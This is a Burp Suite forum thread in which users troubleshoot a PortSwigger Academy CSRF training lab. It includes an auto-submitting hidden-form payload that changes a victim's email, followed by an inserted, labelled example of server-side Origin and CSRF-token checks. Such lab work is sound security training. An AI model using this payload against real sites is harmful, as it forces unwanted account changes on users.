Burp Suite User Forum


Lab: CSRF vulnerability with no defenses

Sunny | Last updated: Aug 17, 2020 05:03AM UTC

Hello, going through the lab https://portswigger.net/web-security/csrf/lab-no-defenses, for some reason it does not get solved. https://forum.portswigger.net/thread/lab-csrf-vulnerability-with-no-defenses-35a98ebd I had some problems with the passage, I found people who had the same problems. Here is the video: https://www.youtube.com/watch?v=lkDj4WA9AEg

The solution I'm using is:

```
<form method="POST" action="https://ac541f2c1facfe6680197eeb00cd0062.web-security-academy.net/email/change-email">
    <input type="hidden" name="email" value="test&#64;test&#46;com">
</form>
<script>
    document.forms[0].submit();
</script>
```
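Added example, not part of the thread or of the lab's code: the form in the post above is accepted because the endpoint relies on the session cookie alone. This sketch shows the server-side check that would refuse it, assuming a hypothetical `csrf` form field, a hypothetical `session.csrfToken`, and placeholder origins.

```javascript
const crypto = require("crypto");

// Constant-time comparison; an empty or non-string token never matches.
function tokensMatch(sent, expected) {
  if (typeof sent !== "string" || typeof expected !== "string" || !expected) return false;
  const a = Buffer.from(sent), b = Buffer.from(expected);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Decide whether a POST to the email-change endpoint may proceed.
// req = { headers, body } and session = { csrfToken } are hypothetical shapes.
function checkChangeEmail(req, session, siteOrigin) {
  const origin = req.headers.origin;
  // Browsers attach Origin to cross-site form POSTs; reject any foreign one.
  if (origin !== undefined && origin !== siteOrigin) {
    return { allowed: false, reason: "cross-origin request" };
  }
  // The session cookie alone is not proof of intent: require the per-session token.
  if (!tokensMatch(req.body.csrf, session.csrfToken)) {
    return { allowed: false, reason: "missing or invalid CSRF token" };
  }
  return { allowed: true, reason: "ok" };
}

// Constructed sample data (placeholder origins, not real lab hosts).
const SITE = "https://app.example";
const session = { csrfToken: crypto.randomBytes(32).toString("hex") };

// Shape of the request an auto-submitting form produces: only `email` is sent.
const forged = { headers: { origin: "https://exploit.example" }, body: { email: "test@test.com" } };
// Same request with no Origin header present: there is still no token.
const forgedNoOrigin = { headers: {}, body: { email: "test@test.com" } };
// Request from the site's own form, which embeds the per-session token.
const genuine = { headers: { origin: SITE }, body: { email: "test@test.com", csrf: session.csrfToken } };

for (const [name, req] of Object.entries({ forged, forgedNoOrigin, genuine })) {
  console.log(name, checkChangeEmail(req, session, SITE));
}
```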

Ben, PortSwigger Agent | Last updated: Aug 17, 2020 01:26PM UTC

Hi, I have just used the solution that you have provided in your forum post (changing the lab ID to the one I am using) and it has successfully solved the lab for me. Are you storing the exploit after you have copied it into the Exploit Server? Are you using the correct Lab ID URL?

Sunny | Last updated: Aug 18, 2020 04:32AM UTC

Hi, yes, I tried several methods already, and through XHR, and recreated the rooms several times, it still did not work.

Ben, PortSwigger Agent | Last updated: Aug 18, 2020 07:34AM UTC

Hi, are you able to provide us with step-by-step details of how you are trying to solve the lab so that we can take a further look for you? As mentioned, using the solution that you initially provided worked so the lab is functioning as expected.

Carolina | Last updated: May 25, 2023 02:44PM UTC

Still the same issue, it doesn't work despite using several machines and networks, also doing several attempts.

Ben, PortSwigger Agent | Last updated: May 25, 2023 05:18PM UTC

Hi Carolina, I have just run through this lab and been able to solve it using the solution provided so it is working as expected. Are you able to provide us with details of what you are configuring in the Exploit Server? Have you paid attention to the note in the 'Hint' box?
